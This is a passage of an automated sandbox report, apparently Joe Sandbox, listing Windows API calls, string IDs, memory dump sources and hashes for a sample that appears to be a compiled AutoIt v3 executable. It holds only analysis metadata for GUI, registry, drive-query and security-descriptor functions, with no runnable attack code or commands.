                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00266FB7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                • String ID: 0
                                                                                                                                                • API String ID: 2760611726-4108050209
                                                                                                                                                • Opcode ID: 3308f2f02d27b7a89766bdc5bca95e57f4c1d2e0005646d7b35ecaf4084c5529
                                                                                                                                                • Instruction ID: 0c0aa88ebe893425b0f352fef5591e9110af49aa4e278df52fdd9cfd8194f6f8
                                                                                                                                                • Opcode Fuzzy Hash: 3308f2f02d27b7a89766bdc5bca95e57f4c1d2e0005646d7b35ecaf4084c5529
                                                                                                                                                • Instruction Fuzzy Hash: 9D129B30621252EFD729CF24E888BA9B7E5BB45300F154469F4859B662CB72ECB1CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • DestroyWindow.USER32 ref: 0029273E
                                                                                                                                                • SystemParametersInfoW.USER32 ref: 0029286A
                                                                                                                                                • SetRect.USER32 ref: 002928A9
                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002928B9
                                                                                                                                                • CreateWindowExW.USER32 ref: 00292900
                                                                                                                                                • GetClientRect.USER32 ref: 0029290C
                                                                                                                                                • CreateWindowExW.USER32 ref: 00292955
                                                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00292964
                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00292974
                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00292978
                                                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 00292988
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00292991
                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 0029299A
                                                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002929C6
                                                                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 002929DD
                                                                                                                                                • CreateWindowExW.USER32 ref: 00292A1D
                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00292A31
                                                                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00292A42
                                                                                                                                                • CreateWindowExW.USER32 ref: 00292A77
                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00292A82
                                                                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00292A8D
                                                                                                                                                • ShowWindow.USER32(00000004), ref: 00292A97
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                                                • Opcode ID: 1746e4c7bee64475d1df6441874c0e9b45118efccdf425d36da2c554fd58bdb9
                                                                                                                                                • Instruction ID: bac5c257a81756ba46d57fd5f47093f962abc43c1a62fb19206c4189af68ad81
                                                                                                                                                • Opcode Fuzzy Hash: 1746e4c7bee64475d1df6441874c0e9b45118efccdf425d36da2c554fd58bdb9
                                                                                                                                                • Instruction Fuzzy Hash: 68B16A71A50205BFEB14DFA8DC89FAEBBB9EB49710F104154F914EB290DB70AD50CBA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00284AED
                                                                                                                                                • GetDriveTypeW.KERNEL32(?,002ACB68,?,\\.\,002ACC08), ref: 00284BCA
                                                                                                                                                • SetErrorMode.KERNEL32(00000000,002ACB68,?,\\.\,002ACC08), ref: 00284D36
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                • API String ID: 2907320926-4222207086
                                                                                                                                                • Opcode ID: d72ea061841c17183ea8a1397b178a0eb083c36dd8fc147e8b9b356a6d1dae56
                                                                                                                                                • Instruction ID: 49e435113685efd30c1c0a7dc7ca860ffb7ed2a165ac8215e79f9134c2f56d35
                                                                                                                                                • Opcode Fuzzy Hash: d72ea061841c17183ea8a1397b178a0eb083c36dd8fc147e8b9b356a6d1dae56
                                                                                                                                                • Instruction Fuzzy Hash: FF61A1386361079BCB04FF24DA859ACB7B5AB15304B248117F806ABBD1DBB1EDB1DB41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetSysColor.USER32 ref: 002A7421
                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 002A7425
                                                                                                                                                • GetSysColorBrush.USER32 ref: 002A743B
                                                                                                                                                • GetSysColor.USER32 ref: 002A7446
                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 002A744B
                                                                                                                                                • GetSysColor.USER32 ref: 002A7463
                                                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 002A7471
                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 002A7482
                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 002A748B
                                                                                                                                                • SelectObject.GDI32(?,?), ref: 002A7498
                                                                                                                                                • InflateRect.USER32 ref: 002A74B7
                                                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002A74CE
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 002A74DB
                                                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002A752A
                                                                                                                                                • GetWindowTextW.USER32 ref: 002A7554
                                                                                                                                                • InflateRect.USER32 ref: 002A7572
                                                                                                                                                • DrawFocusRect.USER32 ref: 002A757D
                                                                                                                                                • GetSysColor.USER32 ref: 002A758E
                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 002A7596
                                                                                                                                                • DrawTextW.USER32(?,002A70F5,000000FF,?,00000000), ref: 002A75A8
                                                                                                                                                • SelectObject.GDI32(?,?), ref: 002A75BF
                                                                                                                                                • DeleteObject.GDI32(?), ref: 002A75CA
                                                                                                                                                • SelectObject.GDI32(?,?), ref: 002A75D0
                                                                                                                                                • DeleteObject.GDI32(?), ref: 002A75D5
                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 002A75DB
                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 002A75E5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1996641542-0
                                                                                                                                                • Opcode ID: ee23e402d7e7966a842722ce6251285bc3ab4271219e7e3ff34df784f56049e5
                                                                                                                                                • Instruction ID: 4547e5e30b8ccc175d67d895a2ef86e65e84d1ede62dcf469c232b3a286886ae
                                                                                                                                                • Opcode Fuzzy Hash: ee23e402d7e7966a842722ce6251285bc3ab4271219e7e3ff34df784f56049e5
                                                                                                                                                • Instruction Fuzzy Hash: 83614272D04219AFDF019FA4EC49A9EBFB9EB0A320F214125F915B72A1DB749950CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetCursorPos.USER32(?), ref: 002A1128
                                                                                                                                                • GetDesktopWindow.USER32 ref: 002A113D
                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 002A1144
                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 002A1199
                                                                                                                                                • DestroyWindow.USER32 ref: 002A11B9
                                                                                                                                                • CreateWindowExW.USER32 ref: 002A11ED
                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002A120B
                                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002A121D
                                                                                                                                                • SendMessageW.USER32(00000000,00000421,?,?), ref: 002A1232
                                                                                                                                                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 002A1245
                                                                                                                                                • IsWindowVisible.USER32(00000000), ref: 002A12A1
                                                                                                                                                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002A12BC
                                                                                                                                                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002A12D0
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 002A12E8
                                                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 002A130E
                                                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 002A1328
                                                                                                                                                • CopyRect.USER32(?,?), ref: 002A133F
                                                                                                                                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 002A13AA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                                                • Opcode ID: d71d3bcf6a6d98c22667619322165dbccd4272a0ab38a4bd3ba76b57063c6a5c
                                                                                                                                                • Instruction ID: a5b3749c3048d22f293a331b5fde06eafa0273e7127b9c7ca269d3c62526d051
                                                                                                                                                • Opcode Fuzzy Hash: d71d3bcf6a6d98c22667619322165dbccd4272a0ab38a4bd3ba76b57063c6a5c
                                                                                                                                                • Instruction Fuzzy Hash: FCB1AF71618341AFDB04DF64C888BAABBE5FF85750F00891CF9999B261CB71E864CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 002A02E5
                                                                                                                                                • _wcslen.LIBCMT ref: 002A031F
                                                                                                                                                • _wcslen.LIBCMT ref: 002A0389
                                                                                                                                                • _wcslen.LIBCMT ref: 002A03F1
                                                                                                                                                • _wcslen.LIBCMT ref: 002A0475
                                                                                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002A04C5
                                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002A0504
                                                                                                                                                  • Part of subcall function 0022F9F2: _wcslen.LIBCMT ref: 0022F9FD
                                                                                                                                                  • Part of subcall function 0027223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00272258
                                                                                                                                                  • Part of subcall function 0027223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0027228A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                • API String ID: 1103490817-719923060
                                                                                                                                                • Opcode ID: 322a3fd4288b5f0fd240a11cbb61583ffe22f62c55a29d6b2a26bc1f1daa3667
                                                                                                                                                • Instruction ID: ca5b32b6a99fb70def952423899f6139bb406fe14872a2d4578785c86eb9533a
                                                                                                                                                • Opcode Fuzzy Hash: 322a3fd4288b5f0fd240a11cbb61583ffe22f62c55a29d6b2a26bc1f1daa3667
                                                                                                                                                • Instruction Fuzzy Hash: BDE1DF312383019FCB14DF24C59092AB3E6BF9A714F50496DF8969B3A1DB30EDA5CB81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SystemParametersInfoW.USER32 ref: 00228968
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00228970
                                                                                                                                                • SystemParametersInfoW.USER32 ref: 0022899B
                                                                                                                                                • GetSystemMetrics.USER32 ref: 002289A3
                                                                                                                                                • GetSystemMetrics.USER32 ref: 002289C8
                                                                                                                                                • SetRect.USER32 ref: 002289E5
                                                                                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002289F5
                                                                                                                                                • CreateWindowExW.USER32 ref: 00228A28
                                                                                                                                                • SetWindowLongW.USER32 ref: 00228A3C
                                                                                                                                                • GetClientRect.USER32 ref: 00228A5A
                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00228A76
                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00228A81
                                                                                                                                                  • Part of subcall function 0022912D: GetCursorPos.USER32(?), ref: 00229141
                                                                                                                                                  • Part of subcall function 0022912D: ScreenToClient.USER32(00000000,?), ref: 0022915E
                                                                                                                                                  • Part of subcall function 0022912D: GetAsyncKeyState.USER32 ref: 00229183
                                                                                                                                                  • Part of subcall function 0022912D: GetAsyncKeyState.USER32 ref: 0022919D
                                                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,002290FC), ref: 00228AA8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                                                • API String ID: 1458621304-248962490
                                                                                                                                                • Opcode ID: 295f2b7022dde2e198b7b43a1fb05ef80f043e60ed5316a8493b20d9ba13fb35
                                                                                                                                                • Instruction ID: 7a7fcc0a8ed1031864a860ca4395e50d2558664b5b604c60393202687e13f7b3
                                                                                                                                                • Opcode Fuzzy Hash: 295f2b7022dde2e198b7b43a1fb05ef80f043e60ed5316a8493b20d9ba13fb35
                                                                                                                                                • Instruction Fuzzy Hash: 00B19431A1021AAFDF14DFA8ED49BAE7BB5FB49314F104129FA15A7290DB70E860CF51
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 002710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00271114
                                                                                                                                                  • Part of subcall function 002710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 00271120
                                                                                                                                                  • Part of subcall function 002710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 0027112F
                                                                                                                                                  • Part of subcall function 002710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 00271136
                                                                                                                                                  • Part of subcall function 002710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0027114D
                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00270DF5
                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00270E29
                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00270E40
                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00270E7A
                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00270E96
                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00270EAD
                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00270EB5
                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00270EBC
                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00270EDD
                                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00270EE4
                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00270F13
                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00270F35
                                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00270F47
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00270F6E
                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00270F75
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00270F7E
                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00270F85
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00270F8E
                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00270F95
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00270FA1
                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00270FA8
                                                                                                                                                  • Part of subcall function 00271193: GetProcessHeap.KERNEL32(00000008,00270BB1,?,00000000,?,00270BB1,?), ref: 002711A1
                                                                                                                                                  • Part of subcall function 00271193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00270BB1,?), ref: 002711A8
                                                                                                                                                  • Part of subcall function 00271193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00270BB1,?), ref: 002711B7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4175595110-0
                                                                                                                                                • Opcode ID: e61ee62df7f33dd50d98223172a4eb210eb6d96617847ba3ffc2b680a38765bd
                                                                                                                                                • Instruction ID: 1d795297315acf2962ef11c496b97356100dee1137cd7a5ff72595dca4a504c8
                                                                                                                                                • Opcode Fuzzy Hash: e61ee62df7f33dd50d98223172a4eb210eb6d96617847ba3ffc2b680a38765bd
                                                                                                                                                • Instruction Fuzzy Hash: 9C716E7191021AEBDF20DFA4EC88FAEBBB8BF05300F148125F919E6191DB719919CB61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0029C4BD
                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,002ACC08,00000000,?,00000000,?,?), ref: 0029C544
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0029C5A4
                                                                                                                                                • _wcslen.LIBCMT ref: 0029C5F4
                                                                                                                                                • _wcslen.LIBCMT ref: 0029C66F
                                                                                                                                                • RegSetValueExW.ADVAPI32 ref: 0029C6B2
                                                                                                                                                • RegSetValueExW.ADVAPI32 ref: 0029C7C1
                                                                                                                                                • RegSetValueExW.ADVAPI32 ref: 0029C84D
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0029C881
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0029C88E
                                                                                                                                                • RegSetValueExW.ADVAPI32 ref: 0029C960
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                • API String ID: 9721498-966354055
                                                                                                                                                • Opcode ID: 34dbd3ccedb8246d8fd1da757e18e40f4fd7512f50b96eed17a5de545eb770f2
                                                                                                                                                • Instruction ID: bc53d1bece745d437f9c3d87394c5ef348b64b13f724bc2a3bf3c68f2c06f937
                                                                                                                                                • Opcode Fuzzy Hash: 34dbd3ccedb8246d8fd1da757e18e40f4fd7512f50b96eed17a5de545eb770f2
                                                                                                                                                • Instruction Fuzzy Hash: 5D126975624201AFDB14DF14C891A6AB7E5FF88714F24889DF84A9B3A2DB31EC51CF81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 002A09C6
                                                                                                                                                • _wcslen.LIBCMT ref: 002A0A01
                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002A0A54
                                                                                                                                                • _wcslen.LIBCMT ref: 002A0A8A
                                                                                                                                                • _wcslen.LIBCMT ref: 002A0B06
                                                                                                                                                • _wcslen.LIBCMT ref: 002A0B81
                                                                                                                                                  • Part of subcall function 0022F9F2: _wcslen.LIBCMT ref: 0022F9FD
                                                                                                                                                  • Part of subcall function 00272BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00272BFA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
